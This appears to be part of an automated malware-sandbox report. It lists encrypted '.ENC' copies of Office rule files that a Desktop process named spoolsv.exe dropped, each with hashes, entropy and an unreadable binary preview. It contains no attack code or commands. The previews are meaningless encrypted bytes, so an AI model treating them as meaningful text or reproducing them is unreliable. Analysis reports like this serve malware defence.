                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.0.9N.@c"....X.k..M}.tca:n.m...Kl...5.U(v.`nba......a.g..E..E/|..j]....m..$/......._..P..Q.j.DP..<.....m.r..k..9..~7.v....v....TQbN.,8.F....B..Q:....v..E;4Qd..(}Z.d.%l.....A_'g..vP_L..Hfp...]"$?.90..^...+.=.....q.B.....^..{.5..:s@.........k...n..a..|_....I.,1.fQ...c^...P...=..]".~t..S.6.N.5...v.r..\<L..u<...S...|S.5Vg[r.9...-m..5......fg..S.#...{.. &..OIp.=Fw>. *........?.H.ma.P..\.|Z.j..xP.?&h(`+5.(..!....z.....w.?..S..s7I.....].N=t5.E.2Z..t.=PL..B....A....~..).....|......g..i"...MD....I......P....=.[<8....i. U.Dy_e..q.U....D'.....$N.y....n...\...8.P(.... ..5.x.j..%Sb......g.. 9..,.z..........0......./.F.A7..hm..7s..}.2].4.........OJi...ZQ...^]..H$Yt...^D}.P...b...y...;....8..<....3.OX..wSK........`.`0....D.......n.3."..q.+..%. m.A.SWT..p......iP.G{m.=..Z..<l....ru.$.S.mhr.$E...=.\..a......B... ..c&.....A...5...|.'..3..{.kI.0....ip..qRR=....L.h.^.. VQl.!.!.YF.j^.....GF.Gu.B..T'.E/.......N..v.s

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703551v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1424
                                                                                                                                                                                                                                                      Entropy (8bit):7.855770492275946
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+7KRHVrWYz0ukmoxPFY60ZELwRI94jq1Nv7Rjh0Zqtr1N/rDKOZ:+elNsuBgdqZ0BNTRjWotBNvKOZ
                                                                                                                                                                                                                                                      MD5:23FEA4F50D81798DE4800A69F0040D40
                                                                                                                                                                                                                                                      SHA1:DBF8CF6887E7C699E82030521AF9058D62320E75
                                                                                                                                                                                                                                                      SHA-256:D468CC08C819791F6C0B14A3C5C5FE536C04B66578B3AF08A114EB25AB23C776
                                                                                                                                                                                                                                                      SHA-512:B4281E3EC35B13BCF1C2A3B5A0BDF63D8F0844CFABE86DA8DE6835ECCB9AA8B43C66E04CF02A03CF24EAE8494D0BB9F9CE5B866F7CE61B68EF3AFC550B6D4C5C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F...^..m.)gc,....aU..YP.O...>....Hh..p.w....2U@.......'..b..Y@.P.K....D.I#."..V(..(N....V+...nq.-..>.G......>..Y........Y.....P...n1.L..N.'PY..7.?....(alF..N.c\S.j.(r7.D..r..|>...a.><.....(..........N..GC..4...>y..9...u..bFt.|..:}....1...`.E.$...u.g..I.......V..B.-..3.b...V..O..s't6(.<...R.G..CZP.".6..j..._......7..`&.& M...MJT.>w.;Ax.......=iH...[yZ.?e...:.."a....).k.h.s.T.=#.!.....|C.8V...o./....k.cDR.(...0.{.....o..c...m..&;J..n8Ge.|..z.[...zgF.d.Xk.`..&.Y.8>.Z......a..`'X..t........^..t..sw.....5_..z...........Dz..9....}D`...#...@.....e..|.:q.9)...+...X...../../...|P...J....y.........`.N....3%.......c.&..../._..R....%.@G...P(......Qu~.g...yV..E[I.......H"j.^l\....y..3='s.e..t79....h..=8.[..ZuoT..4....zY...;K.m......0..0...w!.....:.Ox....am........k..{.33.^../........J.. VL....2..3(.;f..nV..8...-.-...f4....3.5...+J..L..>..woo..5N.H.DO..`.B6c....~.F.....0.Qm\=..;z.N.|K5..N:.g.|.......,...7

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703600v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                                      Entropy (8bit):7.850541216828637
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+pYvF6dTAYFA3LhgNtdHf/mgksp7cnTfdOdo/sqJkP6LWTJdQ:+OdjYsg3Hf/mgkI7cTOo/sqWPmgJK
                                                                                                                                                                                                                                                      MD5:0E9738D230936114984DC6BE1A31C0C6
                                                                                                                                                                                                                                                      SHA1:AF9B024AE20D94B31597B55ADBCE09AD84751D24
                                                                                                                                                                                                                                                      SHA-256:571D2F9224CD48AE151D8D4A41414D6356031EEE2202D56504CD0E23E2AE8292
                                                                                                                                                                                                                                                      SHA-512:17C49A8DE3FBDA6345BF0BCC2524CC6E17FAA079E07395C896FEF5AAA9A1F0C29EA74AC102CEAFA707102AA2886D020AF95F73A9289B5BD9389956ABE7FD74F8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F..Ud.......u..Am........(.M..F..H.cIsn..m.h.f..b6..B.AQ'.......:s..'.:..--...u...##..u...A. ..lS&NZ...u)N..].Vv......u.__>.`.~./ ...M..b3.GPM@..#'R..LY.@7.%.(...P../...Y......1mH.7m.c...G.L.4?5.L.N..M.L$..@|.>H...f....e.>Z..X3..p..4......I3F............9.y...l..6.}....._#.$.../N....%#Xo....+.m ..M.M.2..p.6k..B.{......#..... ..a.Q...6..w..&.S....<].%.'..s..Wc....../"./.....&B.8...A...:..90~'...vB ....7|..$...|=.......!...j..P......r....B.....l.H..b..~...y..*..). ..3R..?...Z...`...?.{[Qx..P.Q.2.J.b\.3...+H.../...7.....U....J.s.....Fz...*.=...... .(0.O....l.lI.w.D..H2..c.....N..C.y........t....9)..p.....V..l.J=...!.x..i.....T?Z..$R....M1WJ?R.o...(.F...E,..c.........K...K.t^.]...l..I..2..oE.rK.........~[IS.$.D.P.7.A..a.GI..{j.M..z.~..O..0#...D.0.l..gT/.......O......z...%fP.P.M....!.t....E./h..DJ.0...%.3...Y)Kg...0.m../...A.g.l]#F3..9.....%..sQif...E.x..].KL..yu/.5$..*0.EW/...E.5...xX}.A..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703601v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.877918332643144
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+5lyWCFLJIfq428yXGihUqmkbcz/m3AYeYOhM6WzBP7jycsRxS0blp:+50WC4s8yX72wbcdqxBPXqxSCH
                                                                                                                                                                                                                                                      MD5:68B43B5BF8953B7C38CEF098F6CFD6A3
                                                                                                                                                                                                                                                      SHA1:703DEEDCD15370CE4898BB27C8D0D2CE56BFE38E
                                                                                                                                                                                                                                                      SHA-256:F3874B92510C069D5E149926DDD75556F2E80E7D67217B2BEB79162192FCA5F8
                                                                                                                                                                                                                                                      SHA-512:5437116BB0E69CAFD2406EA4ED675313424BF0642F6D96384BB1B89D6DC53D4B9DBAE9F121B8C2B5FE94394163731FD0F6652E38F9C7F8BB02FEA5191BA87D52
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.T....q.p..T.......='...8.3..'..Q..../Z...G..!..N.4..z8`....o.].\q.S...V..............#.K..`. .y<..sF.A.3.h..M....V.Tw...w...K{p..1n.XO.Z[...I.......y`...!..;. .d..9.kV.7Xiy.......+.]....2......t...h\._.oo%EenAM..s.,.e1."*d.].......o...Cj.5...S.jl...i..!...V...+._.<..w.q&E....@Q.....y..8..t.5.R.....ax.6.H...!.(.<;^.....`:.~........E%.r.H..7.=..Ot..A._....Kd...A..V=.U...|}C.>.{..Th?.y.b.p.x.../.k...V.VU>jI...J...x.&K2..t4Ae.PjI...!/.s...9.`(.........Nf..b...1(..NF..........-......*......T..i.. %.@...'3.-.(...n..4/...r&...Af..P.*f..{&.M.....Q...?].o....t..Cr(....G.\.g...<..5.w.,Y.....5Dd.......*.M.\....s...:uW#......7........|0"0...#z\.%..1...F|.e.\$_... eC....y.*....n......\....`J.....}.b...|$"a.. .1..q..2)]!&.......M?,^U.r.x.sU.bfd.4g#5.%6...'....J._o.....A.m.....E..2U...s....`....Z....:R....,.....T.W...o~......A!..VG7,...y..L...z.W.y40 @.k.*d7.t...;..G..m...w..T.'.Ue....x.+J...<..7..W!......+..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703650v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                                      Entropy (8bit):7.848096181705045
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+Mw9hDEw0++Yn71wa9qgkevdfn49HszR4yEX+9GAfk2n0TqcahfRjXjnz:+Bhj0+6AqQ2p2HEXoGA8e0+PXjjz
                                                                                                                                                                                                                                                      MD5:BB33D774D49F0AC3CA326353EA5B5BA0
                                                                                                                                                                                                                                                      SHA1:38E0414A61434377DB96204FD2D74D3CA36D5F16
                                                                                                                                                                                                                                                      SHA-256:B2456FA20C82EA2E5CFED02E3B3A94DEC6850509154E4EA179C33F8220C92114
                                                                                                                                                                                                                                                      SHA-512:4B7AA4545E9A1DB3B7459F0D4437EF8941FB3E08B9C1B184C34A4BA20BD40942A2220DC41B383FAC0F578EA4C69FDD9488FD247DD798D8CED510868765327B64
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.^]..}.......2.."..}ClKe^.....c..K...{..;YG....^m..~Ji...1../..cTK..](pU?[.2.C........6]. .....a='....*W.k.TB...'../.6.H..D....7.az~FB.......'0..}+O&8..k..`N....0.)S.!_.>......}..b..!k<.$...1.I.....%p.........U...}.j.j..g.O.K.W....k.2..;.f[K.?..X..o-:....j..g.4.5.s..4..s..M.P..iQ..3."..l............;[Huzu.q....v...ba':....Q....C....B..pJ'_0....j}.....u.>@.O.......g..6L.....G0.......l/.1R."./r.0.Ze...3.'...q.-..!.E3............;.$....(?I..?...n.ly...h.t.)l.fj...u...O.j..66.3.S....i.@X.zs-.qV.n.4......g.v*..........O..,.hr...n....:..#.7.QQgpPf.&F.S......~.7..o.`.",.-....S.[to.M...#KL......P.....$....l`q.n......wc..'..o........ ......^.....d..J............p{...pT]......iE.N&..Ud........!...Sj... ."..G$..C+........1#..........+<.k.O...xK....yL...z..........k..M....l.=.....h.f.3yd..(.........R.p=..5...|...IE.a>.)...V.w..+N.s...<m^.g...{.Z...../....../.......?..X.E....r6.n.M.dO..q.....Y..Uq.U

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703651v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.862716120059318
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+iwXu7YbUswrhu4DpBVf56csPARuX/L93p5UqgF1aVim8n9+3/vnnQ3ERV:+ig4YQsw9uS/kcnyR+TO803XnnV
                                                                                                                                                                                                                                                      MD5:B48BB5047F882D4E567F24E766BE628F
                                                                                                                                                                                                                                                      SHA1:219BAC3309F4EA064D9E208B71FBD3ECF4CF2663
                                                                                                                                                                                                                                                      SHA-256:D9302E11F5C5102C161E93777890D1D331D3C4C71C32ABF87B6C9D57AEBDFB89
                                                                                                                                                                                                                                                      SHA-512:9F518FE9A6F4528B660D8E15E518F3B64880CFA8B0ABCF8CF8D01568D27E9CFFBA0E19560C8A63D326190936441F66CBBC6E262FB18C74E94A9679665477A3A3
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.....z%.4.k...+..'.W...../...?........`...G.{..ffD.ndr1.@E;S.].Bk.r.2w7B.2$8.....V...q.Z...e.SM?.)?U.&u...[GhFHwp..:[..*.|h...di..Y..6a."1J.......4.%..T.!!'m....wN...qF.9..1.w.IVf...r.m.j..P....7r...5.e1L..(..6$3........:U..a....m.i..k........e.J...vO.;.5.X7.^.!.Hwn....zS..hP....@d.(....%./...wB....1.-L....S.T:..Z.*.]....D...y.<$=Dl.bp.3.'@y.........DQ.y.g.c.".s..$...r.&@U...p\........PC.<i.Y .......[M.}....G..)...]y\.B..^/'E....Q.....q-.q..A=.J..5.d..6.j..]..L..b.L..Z!..1.....R..($u>..._W...K.+.(H....S.%i.!V...+.X..!..>.b.....F.p.;7'...[]b..F....#......(i..).gOQ.T...F*.B}...S8...nlX.?mNT..m.(..CL..f....r%.........G..Oc!C...uO9...F......I4"...:h.....p.B,.....o.....#.u....*i...qo.!'.M..........u.-.%+.....^=........|.?........M....P.#.........|T/...U....*.Y..E.....e.o.[..f...2.&h.......2..y...V~[....BE..N..6...+~.R32./..P.....R...F4bf.b......F.D!..Jg.h.c....@._....Y.....b................w.#.p

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703700v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1392
                                                                                                                                                                                                                                                      Entropy (8bit):7.864414614913466
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+MFsd3oLvsrZT9XR4hQUoogZ3tpe/R472gWF0cSP5sgIWkcNPU4zvZ7wQt5LDfHT:+Usd3oLOTBpAE3SiagWOnWWZNU4zvZ77
                                                                                                                                                                                                                                                      MD5:1342E1B22FA27E025FC846312FBCF9C0
                                                                                                                                                                                                                                                      SHA1:630020D3BA1CDA0EEDDD9FBCC90E101FCDE93371
                                                                                                                                                                                                                                                      SHA-256:8423AFDA4EA57A2BB858A463A386A03BB837E84BA4AB3D3D99639F670EB0607B
                                                                                                                                                                                                                                                      SHA-512:27A6D488AF4BF33F56412C5BA24478ADEE3F0E21BF79AE8BB683F6C592FEE3C504DBBA5DBAFD84DF7CB2653385E04DFD3932B0994A3725471A0569026E107BA7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.>.!.3k7...m.;zr.y..i}..........^.6.....3.........S.j.a...qxE...4..v...t.H......eHr...5...A..3..#N(.(t...c.3..6s.r.'.Bx/hw......Exr&#f..'..+.....^.{...j............M...v.Y...N....Rr....b.j..i.I...]....AJ<.ecd...(.}.m.4..~FL.w...\|T].[.f.....]y..$.\..(....+."..U.S.......j.y....4.o.......&5..*.X.e.."o.A.D...s ....s..l.k...hQt.&..O.B..4.0....s....@.1?d..@.r....;.;{X.%...b...5.bz.S.s.Y.O.@.i.........Z...A.,$..~(R.....9.N~.$B!....h.5.......uO..6..O].ER.......s'.a0....u..z..=`.y%z1.D...........G..H1..3b......B.....O...{0..3&/..6M.........../F....\.....c..EA...."}K..Ay..C.zV.Z.......Ftu5...tM.P..Bgg.<.x...\9."a...-...e.....NSg...*.wG..C..G..T.P....A..<.n..v~f.W.....$.:.........W......1.j.J .qk..6E..F..kZ...&j.....p...]h.....M.j..z&\1.P...;..\YIj2........i?&Q.S..i1..7X..."P.. .mq2r......W../5...|.y..Si7...*...pH.].G.,.r..(h....a.%VgwCP.g.6....K.n^.F..B..r....:W..P....\..|,..6<.YbR.r.I.s.....&...w...o....'a...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703701v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1424
                                                                                                                                                                                                                                                      Entropy (8bit):7.857171432417295
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+AmNJcP6UwZ/4lgHKas3PF3Yk+3t0bLnJUOXvIiWR3+CQv2+XNZNVHax:+b3BZ/isfs3lYk+dALnzAik+93V6x
                                                                                                                                                                                                                                                      MD5:2342B9A89ACF6BD060EB8DEF337263E5
                                                                                                                                                                                                                                                      SHA1:6BB88C18B9A081309B45FE73D407DDF0CD2B0DE2
                                                                                                                                                                                                                                                      SHA-256:1BADF339126516F1EFD12331D505FCCBF69629DBBCC84B28D28BAEBDDCA796BF
                                                                                                                                                                                                                                                      SHA-512:0A5236C9B164FB0425DBBCBA82AC025FD318755522F2B064E6BFD62556E7F4A9C683409DB101B2DB627D45C5AA629469A48FE7E0C213BAD2BD5AFED0D8F76C7E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.....X.....H..PJ.#lf,].P..*......X9.,@e.K(~.../5.m...4.8-.R.P..$.f.$.....4N{0\._..$.%...'jlB....dP;.j`>dp.Q.p.n..]...-s.b..orVX.....E....t.. ......e.....p!..|..S..|n..p..a.....|...G..I...A.?...#A..0#.._&T..."...1.i'.\<._.*.n.....2..>.:.../.e.S.H=.......L....<.~.S...Tm..\p6...U.K...6V......G..T^'.m..muN..........3..7.i.....j.)..M.<%.._....m2...)W..T.y.r%..,.DkE.h...y..........CI@e...i......4....o=.".".hp.3.O..o..`.3.J.s.i~@.X...3}eC....._zO].......DV.s.....wn..^..R.<.-f.D....\.r5g4..`V..T..\.c....'.........C#rr%..k..-.g..)...^z[L..e....v.6h.H.>.v....nw..J...........x..}..PO..\po..F8X*.;"..#._.....5g}..@....u.a><.5wmR"..j.nfH{.C.r..D.......5...,'.Vu.E.G.~#~.6=.......fr.,.C....c.H.,lVY..N.5..}..kC.n4...p).&.0.\H...'.....L.`.I..8...Y9..{B.(AV...#.e..{....O.y.j..&.W.\......~e.}..6...\......a2..T.-.3.i....Qb.*.......,O..p$......!....R.%f..G....h..8._...h...f.'.....c_=.........O..yA..x.CZ.}

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703750v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.854730162377496
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+m+jFGHwHzZYcG3BVVX2152rKjLtEtzloN6JBoCaavGJIjq2gSygN6PR1y8cwPF5:+myFGHxcWDASuHIZofYvrvqR1y0NcNWn
                                                                                                                                                                                                                                                      MD5:B308CE6C8B83B7966D95BF77743E8E27
                                                                                                                                                                                                                                                      SHA1:1CC8024EB509A9A38C5137507D2221EE63CF36CC
                                                                                                                                                                                                                                                      SHA-256:ADFDED242ECDA63D75FD13A03AF1AB2055CC2FBA0E7C705420798BC1642B844D
                                                                                                                                                                                                                                                      SHA-512:76EE8EFDC4CCF4C35AA3F12EE46F5CFF016D565E64A187126B1BE2B2DE8399915C67815195FAE0C16B31648618E30FFBBDAEFE3C549192D4FB436BE6C4664548
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.:.0.P..\_..e|H....h..e.%~.....cE.ohfR...kDK..`0].C....lu.=....Z#7.O!=S'...1....X.".&.......8._.k......e[.l..]F.~..=.. S{...^\J.w...j=....H...I.C6...S..z...Ep.......S.p.*5.CO....Q..1k....=SW 8..EI.....(...a./..7A....Y.P] ..9.....J..........t..1..:`.7k.^..`.Aq.e...:?....i.......r..r.3..:3.`...S{.5.....HU.:#R.......y!.`.r..Y..8.}....k.}.]R.k4.r}...&..a.&.+..T.r.].(.j...$O.6".m.."-....dW\.J.....qw .k.N.a..x.HL...1+.?..gr.$..Ln..w.M8./....4i..t...t.i.Df=..|.=6<y....&....G%.7K=.......W...M..r6mrY..m...7c ...5q...'%S.../P..`.I.JH^.h.1h.=..uZk.":.7..v....B.zF...b..6.....L.....t4.0.k..L*..............3.^{.a..........N)..J....Yf.*)]C.....=...9..R.......j.^...a._Ru'T.3.$5...w..T..q.......G}.O.d..[..A=B...1.s./B...|l..3}.g@Y..L..|".p.*<..AOR.6..U.\.Ez .@.........m*...Z.......w.......Nz...h.!.G.I:.{o.q(=......._..6..ig....B.NjX;.../...ls......Ze.h..X"U.e.h...'".........S..../.I...M.....7....y!T....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703751v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1440
                                                                                                                                                                                                                                                      Entropy (8bit):7.860060536816483
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+OKnTdSxiPoKmiXxrM8uPFrnTuecJYEPZDHaDWarUl1QnxA9DLik6bEsFibvUWD3:+h5SETp6PZTuecJ9DnKe1waFL3BjbvUC
                                                                                                                                                                                                                                                      MD5:C7B659AABAE9A9B9D37E897C487D297D
                                                                                                                                                                                                                                                      SHA1:1E4389F200920D1F664931BE9A2B45FAEDFC9850
                                                                                                                                                                                                                                                      SHA-256:CF57485EABBDE02E8187DD46118D58ABCF86C539E77FFC4BA09855B92C0A6A82
                                                                                                                                                                                                                                                      SHA-512:AE4CA9882194A7F08CC5D9467FF6B228C9010FF05E277D750D81AF5293BA95CB9E53A21F15D31E7296C9ED592C3BC8F8EDCACDA46A62A741F24C5000E829D0A1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.#...=mi D.FD.....@1{....s4.mrm.B...+0.m'...M..`.z.|.....Z...3e...WNkm.>......F..$..FG..,.....O..Ky...H7...^.[Yx....Q..#...Hk......]z.R......q..>:... .0A+.S.|m...z..3...g..W...T.1[..%..OY.c.ms....\.<..Ac...+.X....._.......;...D...H....S{.....1.|{!.Q.7.t{|.D..U.^m.bs..Y..$.....(.Ft..........d..pl....U.W.Z..1.N.m*......$.H.8n./i*.*..b.3..Q0.L..<....Y.=..[_Q..c.}..w..m.....c.M...V..0.S..n.95.....Z0...0..'.R.......D......e...@....3..'.c.a.A6y.7>;.D.4<..-.R..T./Cj...n....>.i.v.5...Sa...$@.ap...R.y....I#.b!...\.....G>...F~..K...;N..4.1#FLo..o!i...H..|6...........8....j......u;M1.b_..v..v...Q...].F..L....c.E..........s2...ea.....dX...}..N.X.{..9/.:.0....../I2...zQ.....J.._..+A.....:...~|S)Q/..g..)3Y3.p{V..E^!........._.U..;U>..\..r.;p[./Q.F.I%~..+.....~....k..y|.9z...).=F..i.H.P..z.V:0\A.S....}T.-..U...NX..O...xx..<..p4.......8.....B.p..Eqb*,.}...65$...T*p...>..,..a..\..:..+..n....@].7Z.......

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703800v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1392
                                                                                                                                                                                                                                                      Entropy (8bit):7.88735690560087
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+Gagjl7QN1Yjqs0zy7YrPV6cJVM2tgcJG5bTUbysHhukRbasPKSQ2nG5FS+:+Gak7QiFPF2tfJG58bPxRbasCp5L
                                                                                                                                                                                                                                                      MD5:074F5B0FEAA86B1B4A949A6E554275C1
                                                                                                                                                                                                                                                      SHA1:939CB1EC810D2106670EE75B17E3BD3757D0E47B
                                                                                                                                                                                                                                                      SHA-256:77094AA1B20B2352EBDEF364F26918274EF75694D386935B7EF81CD7ADDFA36F
                                                                                                                                                                                                                                                      SHA-512:8B026DC0FAA077A5F9A7F3B260344A6127D49CFDCC19E25DFA1CB0FA443325B36A6D7D9FECABE52B712101A5C7FF4F693EFA4B52F3A680148E1CEE84E2AD59A8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.....ba...V..."...G-o.'...A5?..2..Z...S.1..qr+...d.....k... "$.g...D.a.h.\.L...8....o]..i.....yk.E..?.m..g...H.Wz.r..C&....\bWz.).....1k..xO,.C]...z.w...,KI.1.....6........:.|.Y"......x.<..Q6q@.............0v...l.....08..!.DjT..U.2~..Y]r..T../.F..-x...H...d..\.a?{.........V6.L.,.*@.te^.-$Kt..j...R&.g.&..u.3!...]..~$.....4xL....oM......4..Qc..W..1..b......4./_.|V...X...0eOc...-7.2....D/.%M.6.....s..F......[.Q..F.cT@O.....Yl.bLS...M...<..n..Zm~...O.,.....G.cj....... X..*U..q.2*.....>..cR})y..#2...B5R..... <...[..o+..l.R4k.ai.0....z.|..v.h....H.j[.(...s1.....S1<.....*.<C.Ie"H...G1B........1X..@[.0G!......L.........".m..X....k.....)...P.._.\..?..G.s....T)=.BV...n..LH..Q@.;...v#.|...G...dp..-Z.0...d..)..uQ..NZ+jwH..|I.i.%X_..l.D7UR......=.....wa...\.+i..k.....qa..r.).%..L.S$.v......6.[.0Ac\..;.sv..j.V.#.p^+x$M.ias..d..."s.0.[..Bm.Mk.Wn.]..6.x...A`.KEtq.../."^eu.5..w....k...mf[.U..............+..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703801v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1424
                                                                                                                                                                                                                                                      Entropy (8bit):7.858394179472931
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+6bx1XBb2XuXoSKdHmU8SpXEiFwIV2u3wEzelOOX9H9a8jSZthu3poE+xm+YIvz8:+YrXBiXuG0qY75vjS3mf+dw
                                                                                                                                                                                                                                                      MD5:A0A0660F57299BBC52E7998328B0E94F
                                                                                                                                                                                                                                                      SHA1:8469CA620ED2BE41B440CD50040ACCF1DA452E8D
                                                                                                                                                                                                                                                      SHA-256:C81E6DB61F471C1B220B13ECA58BB9AAE4C3F0B51967E160119BD75E355222B0
                                                                                                                                                                                                                                                      SHA-512:8285A123AA33C03B6D3170B2296BBBEBFC0AA6BB73261081EEE0D342C84C5AC6A1293520DDC63EDADE8730FAE904FA6F20C4335DDA263676B6C09A70CB63E7FC
                                                                                                                                                                                                                                                      Malicious:false
